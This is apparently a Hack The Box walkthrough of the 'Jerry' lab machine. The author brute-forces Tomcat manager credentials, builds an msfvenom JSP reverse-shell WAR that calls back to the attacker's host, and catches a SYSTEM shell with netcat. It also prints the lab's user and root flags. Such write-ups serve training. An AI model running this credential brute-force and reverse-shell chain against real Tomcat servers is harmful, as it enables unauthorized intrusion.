Skip to content

HTB Jerry done

Jerry

OS:

Windows

Technology:

Apache Tomcat/Coyote JSP engine 1.1
Apache-Coyote/1.1
Apache Tomcat/7.0.88

IP Address:

10.129.143.185

Open ports:

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Users and pass:

Tomcat
U: tomcat
P: s3cret

Nmap

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.143.185_nmap 10.129.143.185 ; cat 10.129.143.185_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 00:48 UTC
Nmap scan report for 10.129.143.185
Host is up (0.032s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Open website: http://10.129.143.185:8080/

It is default website Apache Tomcat 7.0.88
I see manager page: http://10.129.143.185:8080/manager, I need login and password

Bruteforce login and password to /manager

I use software from github: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce, wordlist from /usr/share/wordlists/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
---
I found login and password:
U: tomcat
P: s3cret
___

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ git clone https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce.git
Cloning into 'Tomcat-Manager-Bruteforce'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (15/15), 4.04 KiB | 4.04 MiB/s, done.
Resolving deltas: 100% (2/2), done.

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ cd Tomcat-Manager-Bruteforce 

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ ls -a 
.  ..  .git  mgr_brute.py  README.md

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python2 mgr_brute.py -h                                                                       
Traceback (most recent call last):
  File "mgr_brute.py", line 4, in <module>
    from termcolor import cprint
ImportError: No module named termcolor

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python3 mgr_brute.py -h
usage: mgr_brute.py [-h] -U URL -P PATH -u USERNAMES -p PASSWORDS

Tomcat manager or host-manager credential bruteforcing

options:
  -h, --help            show this help message and exit
  -U URL, --url URL     URL to tomcat page
  -P PATH, --path PATH  manager or host-manager URI
  -u USERNAMES, --usernames USERNAMES
                        Users File
  -p PASSWORDS, --passwords PASSWORDS
                        Passwords Files

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Jerry/Tomcat-Manager-Bruteforce]
└─$ python3 mgr_brute.py -U http://10.129.143.185:8080/ -P manager -u ../user.txt -p ../pass.txt

[+] Atacking.....

[+] Success!!
[+] Username : b'tomcat'
[+] Password : b's3cret'

Create revshell via WAR file

Ref: https://www.hackingarticles.in/tomcat-penetration-testing/

Create payload via msfvenom

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.4 lport=4444 -f war > shell.war
Payload size: 1089 bytes
Final size of war file: 1089 bytes


┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ ls -l shell.war   
-rw-rw-r-- 1 kali kali 1089 Dec 13 20:32 shell.war

Upload revshell

Run revshell

1) Open website: http://10.129.143.185:8080/shell/

2) Start netcat:

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ netcat -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.143.185] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

Read flag: root.txt / user.txt

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Jerry]
└─$ netcat -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.129.143.185] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>cd C:\Users
cd C:\Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users

06/18/2018  10:31 PM    <DIR>          .
06/18/2018  10:31 PM    <DIR>          ..
06/18/2018  10:31 PM    <DIR>          Administrator
08/22/2013  05:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)   2,274,316,288 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)   2,274,316,288 bytes free

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,274,316,288 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1bf
   IPv6 Address. . . . . . . . . . . : dead:beef::7486:475:dad1:91e8
   Link-local IPv6 Address . . . . . : fe80::7486:475:dad1:91e8%12
   IPv4 Address. . . . . . . . . . . : 10.129.143.185
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%12
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

C:\Users\Administrator\Desktop\flags>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   


PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled 


C:\Users\Administrator\Desktop\flags>

References

[Tomcat Manager Login Creds Bruteforce](https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce)
[Tomcat Penetration Testing]( https://www.hackingarticles.in/tomcat-penetration-testing/)

Lessons Learned

Tags